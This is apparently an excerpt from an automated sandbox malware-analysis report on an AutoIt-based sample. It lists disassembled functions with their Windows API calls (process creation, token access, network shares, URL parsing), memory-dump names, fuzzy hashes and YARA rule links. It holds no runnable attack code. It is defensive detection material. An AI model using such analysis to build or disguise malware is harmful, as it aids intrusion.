Sleep.KERNEL32(00000000,?,?,?,?,?,?,00B7FCED,?,00B80D40,?,00008000), ref: 00B81184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B7FCED,?,00B80D40,?,00008000), ref: 00B8118E
Sleep.KERNEL32(?,?,?,?,?,?,?,00B7FCED,?,00B80D40,?,00008000), ref: 00B811C1

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: c7b72dd365894bcdc0fdbebdbd62821ab98f40445463632f7df638ca12dc3c2f
Instruction ID: 56e671965f21b75b754f31aff2e3ea1eee13ce465ea3dd25918f65554c7017ad
Opcode Fuzzy Hash: c7b72dd365894bcdc0fdbebdbd62821ab98f40445463632f7df638ca12dc3c2f
Instruction Fuzzy Hash: 30112A31D0251DD7CF00BFE9E889AEEBBB8FF09751F004895EA85B2250CB709552CBA5

Function 00B7D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00B7D84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00B7D864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00B7D879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00B7D897

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 9577c89797bc0288185ee60b7ab91f26a30e0af3461cc8a8bd3f4a36dcaa2247
Instruction ID: 74740d66757733bd4140433dbda08c7839baf497dcfa6dec6fab3cb0071ecda9
Opcode Fuzzy Hash: 9577c89797bc0288185ee60b7ab91f26a30e0af3461cc8a8bd3f4a36dcaa2247
Instruction Fuzzy Hash: 2511A575605305DBE7208F90EC49FA3BBFCEF04740F10C5A9A529D7180DBB0E5049BA2

Function 00B56FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00B56FDB

Part of subcall function 00B576C2: __fltout2.LIBCMT ref: 00B576EB

__cftog_l.LIBCMT ref: 00B57001
__cftoe_l.LIBCMT ref: 00B57033

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 0de87ca6c3630300964927f864fc70e966faac9d28da771f7a45a2880ba1a9fa
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 7801803258414ABBCF135F84EC41DED3FA2FB18352F488495FE1859070DA36C9B9AB81

Function 00BAB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00BAB2E4
ScreenToClient.USER32(?,?), ref: 00BAB2FC
ScreenToClient.USER32(?,?), ref: 00BAB320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BAB33B

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: f4aa403caff8f9450b7a5845763e7be273c19549ee2b20ec3b3cf75d49391c15
Instruction ID: efd82568dd257593159d04fb2abf161330847e076b5ed54bc4577681617d3e15
Opcode Fuzzy Hash: f4aa403caff8f9450b7a5845763e7be273c19549ee2b20ec3b3cf75d49391c15
Instruction Fuzzy Hash: 26114675D0020AEFDB41CF99C4859EEBBF5FB09311F104166E914E3220D735AA55DF50

Function 00BAB635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BAB644
_memset.LIBCMT ref: 00BAB653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00BE6F20,00BE6F64), ref: 00BAB682
CloseHandle.KERNEL32 ref: 00BAB694

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: eee86a35b19753b80e15d3feade9f3e49ae8d8c0fc1122020860bfaa783cce25
Instruction ID: dc8c1612cbce81e215b2f36f8410f10561d21bb14fc8278ce518ec8eb38f0a36
Opcode Fuzzy Hash: eee86a35b19753b80e15d3feade9f3e49ae8d8c0fc1122020860bfaa783cce25
Instruction Fuzzy Hash: 5BF0FEB25403447AE7102765BC46FBB7BDCEB297D5F404071BA08EA192DB755C1097E8

Function 00B86BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00B86BE6

Part of subcall function 00B876C4: _memset.LIBCMT ref: 00B876F9

_memmove.LIBCMT ref: 00B86C09
_memset.LIBCMT ref: 00B86C16
LeaveCriticalSection.KERNEL32(?), ref: 00B86C26

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 42dcb20709efcc6df58aa8ae2dc70dae350a61ac73726fca9799c7e838d4a80e
Instruction ID: c06529460721b652789394e4d9e55687de0ae0190cb8905efbd29e9c25771212
Opcode Fuzzy Hash: 42dcb20709efcc6df58aa8ae2dc70dae350a61ac73726fca9799c7e838d4a80e
Instruction Fuzzy Hash: F7F05E3A200200BBCF416F95DC85A8ABB69EF46320F0480A1FE085F227DB31E911DBB4

Function 00B22218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00B22231
SetTextColor.GDI32(?,000000FF), ref: 00B2223B
SetBkMode.GDI32(?,00000001), ref: 00B22250
GetStockObject.GDI32(00000005), ref: 00B22258
GetWindowDC.USER32(?,00000000), ref: 00B5BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 00B5BE90
GetPixel.GDI32(00000000,?,00000000), ref: 00B5BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 00B5BEC2
GetPixel.GDI32(00000000,?,?), ref: 00B5BEE2
ReleaseDC.USER32(?,00000000), ref: 00B5BEED

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: ed8715afd2fd483af340940c7d0f5f93d282ffb5a8d283b23ce8e261530c34fb
Instruction ID: 4a3ec165ef62af86beb20dba8a416308491411a9b0b91b5106dc603eaef589f5
Opcode Fuzzy Hash: ed8715afd2fd483af340940c7d0f5f93d282ffb5a8d283b23ce8e261530c34fb
Instruction Fuzzy Hash: E1E06531504245EADF215FA4FC0EBE83F50EB16332F1483B6FA69580E18B714584DB12

Function 00B78712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00B7871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,00B782E6), ref: 00B78722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B782E6), ref: 00B7872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,00B782E6), ref: 00B78736

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 2a6f34f16854cc8615cc205639422c6e33c1d5812233dc3c4aad4272acf17379
Instruction ID: e7429c60d3cd1c66077e7f4318e68d0fd825392f3841702cfc6006073a476bcf
Opcode Fuzzy Hash: 2a6f34f16854cc8615cc205639422c6e33c1d5812233dc3c4aad4272acf17379
Instruction Fuzzy Hash: D1E04F366512129BD7605FF05D0EBE63BA8EF52791F148868B24ACA040DE3488418750

Function 00B7B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00B7B4BE

Strings

AutoIt3GUI, xrefs: 00B7B436
Container, xrefs: 00B7B43B

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: b61705a805d6625c8e812face6154f8f5009c90bc3f27e6ee2c36afa282faf4e
Instruction ID: 193c8accf1d1a3eab84d9e007d6fecba99977216284555e59bfd35d917ef9639
Opcode Fuzzy Hash: b61705a805d6625c8e812face6154f8f5009c90bc3f27e6ee2c36afa282faf4e
Instruction Fuzzy Hash: 95912771600601AFDB14DF64C894F6ABBE5EF49710F2485AEE95ACB2A1EB70E841CF50

Function 00B8AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3FC86: _wcscpy.LIBCMT ref: 00B3FCA9

Part of subcall function 00B29837: __itow.LIBCMT ref: 00B29862
Part of subcall function 00B29837: __swprintf.LIBCMT ref: 00B298AC

__wcsnicmp.LIBCMT ref: 00B8B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00B8B0F6

Strings

LPT, xrefs: 00B8B027

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 158e55379447d64dabbfab998171b19bbe02c5c2731fac06a84931965fd567c6
Instruction ID: 5ecb40170f3df7723b5656ed774fca20d45d9cdc179b5ecdee83d8f587d7bba2
Opcode Fuzzy Hash: 158e55379447d64dabbfab998171b19bbe02c5c2731fac06a84931965fd567c6
Instruction Fuzzy Hash: CF619375E10219AFCB14EFA4D895EAEB7F4EF09310F144099F91AAB3A1D730AE40CB55

Function 00B32957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00B32968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00B32981

Strings

@, xrefs: 00B32975

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 5898da49b6c89b911797b0260f03b8b79aa2bc0bdaa3896968380da44aa92d5a
Instruction ID: baa7c2f6c416690039078f2002d9655321c876a580b234064bed69509022b73d
Opcode Fuzzy Hash: 5898da49b6c89b911797b0260f03b8b79aa2bc0bdaa3896968380da44aa92d5a
Instruction Fuzzy Hash: 265147724187549BD320EF10E886BAFBBE8FF85354F42899DF2D8410A1DF708529CB66

Function 00B89734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00B24F0B: __fread_nolock.LIBCMT ref: 00B24F29

_wcscmp.LIBCMT ref: 00B89824
_wcscmp.LIBCMT ref: 00B89837

Strings

FILE, xrefs: 00B89770

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 3ef2f1b43a797775498c96463bda5996c1671231c7fa2e17fbaec615bc75f53e
Instruction ID: a408aa718ddc05ee088db2644b0e753f6e2716480104f01482e97c3f2633dc41
Opcode Fuzzy Hash: 3ef2f1b43a797775498c96463bda5996c1671231c7fa2e17fbaec615bc75f53e
Instruction Fuzzy Hash: 8241B671A0021ABADF20AAA0DC46FEFB7FDDF85710F0404A9F904B7191DB719A05CB61

Function 00B9258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B9259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B925D4

Strings

|, xrefs: 00B925A5

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 25f7fa579900c2cd8b2b633014bb714234a4661cc4c1ff44088f0f61ac2bb9fc
Instruction ID: 982be7cc8ee8fe66e6e81fcfe1388e8a6fffc0e11508e712559ea42ba4e77acb
Opcode Fuzzy Hash: 25f7fa579900c2cd8b2b633014bb714234a4661cc4c1ff44088f0f61ac2bb9fc
Instruction Fuzzy Hash: 43310871C00119ABCF11EFA1DC95EEEBFB8FF08310F1000A9F919A6162EB315A56DB60

Function 00BA7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00BA7B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BA7B76

Strings

', xrefs: 00BA7ACA

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 7d84c589b0500fc14b47ab780729fb35bf7899de59331970a00a17c8800be5b8
Instruction ID: 3097609ce0729e7dda5d93d29e721336dc7856f8ffb9934662625af89b1be8ae
Opcode Fuzzy Hash: 7d84c589b0500fc14b47ab780729fb35bf7899de59331970a00a17c8800be5b8
Instruction Fuzzy Hash: FF412A74A48209AFDB14CF64D891BEABBF5FF09300F5001AAE904EB351DB70A951CFA0

Function 00BA6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00BA6B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00BA6B53

Strings

static, xrefs: 00BA6AB3

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 439bf03d17c89ccd43731477fc4e65549c0d8ca81bce564bb1faa8c3e142f9bb
Instruction ID: 047e0095549a98d6d9009441b13fd9eb9ad1a3d4c322e40c1767c4bb6c00dbbf
Opcode Fuzzy Hash: 439bf03d17c89ccd43731477fc4e65549c0d8ca81bce564bb1faa8c3e142f9bb
Instruction Fuzzy Hash: FA319EB1200604AEDB109F68CC81BFB73E9FF49760F548659F9A9D7190DA30AC91CB60

Function 00B828A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B82911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B8294C

Strings

0, xrefs: 00B8290A

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: daecf9cddde52c2dbf7f4d965d654c02b0e9c3a54513f797483bceb7f73e6452
Instruction ID: 606917449b0a3edb155bb99e4a4a701c28255a5b37fb6ade8314c5226e2b6ca0
Opcode Fuzzy Hash: daecf9cddde52c2dbf7f4d965d654c02b0e9c3a54513f797483bceb7f73e6452
Instruction Fuzzy Hash: 4831A231A00305AFEF24EF98C985BAEBBF9EF45350F1400B9ED85A61B1D7709A44DB51

Function 00B939E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00B93A66

Part of subcall function 00B27DE1: _memmove.LIBCMT ref: 00B27E22

Strings

, $, xrefs: 00B93AA6
AUTOITCALLVARIABLE%d, xrefs: 00B93A58

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 8d09eb49656e88bb984482dcaf5d28235d9f3b943ee9378f0b550c32f70863b4
Instruction ID: fe6d0054d922e8b0d2bfb3d350fee8be2d9ca7528f5126b40239dd43f6f44267
Opcode Fuzzy Hash: 8d09eb49656e88bb984482dcaf5d28235d9f3b943ee9378f0b550c32f70863b4
Instruction Fuzzy Hash: 8F216D31600229AFCF14EF64DC82EAEB7F5EF48700F5044E5E559AB291DB30EA45CBA5

Function 00BA66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BA6761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BA676C

Strings

Combobox, xrefs: 00BA672E

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 6c6cb0ef5bd78c6167c10b60fff50e8447d5b1ae96b20f850072dcaf889a5985
Instruction ID: bda6597d014d42f24e50b24c44438c7424c981614a8e3e8f14b457244eb06781
Opcode Fuzzy Hash: 6c6cb0ef5bd78c6167c10b60fff50e8447d5b1ae96b20f850072dcaf889a5985
Instruction Fuzzy Hash: C111B6B5214208AFEF119F54CC81EFB37AAEB55368F150165F91497290D6319C5187A0

Function 00BA6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

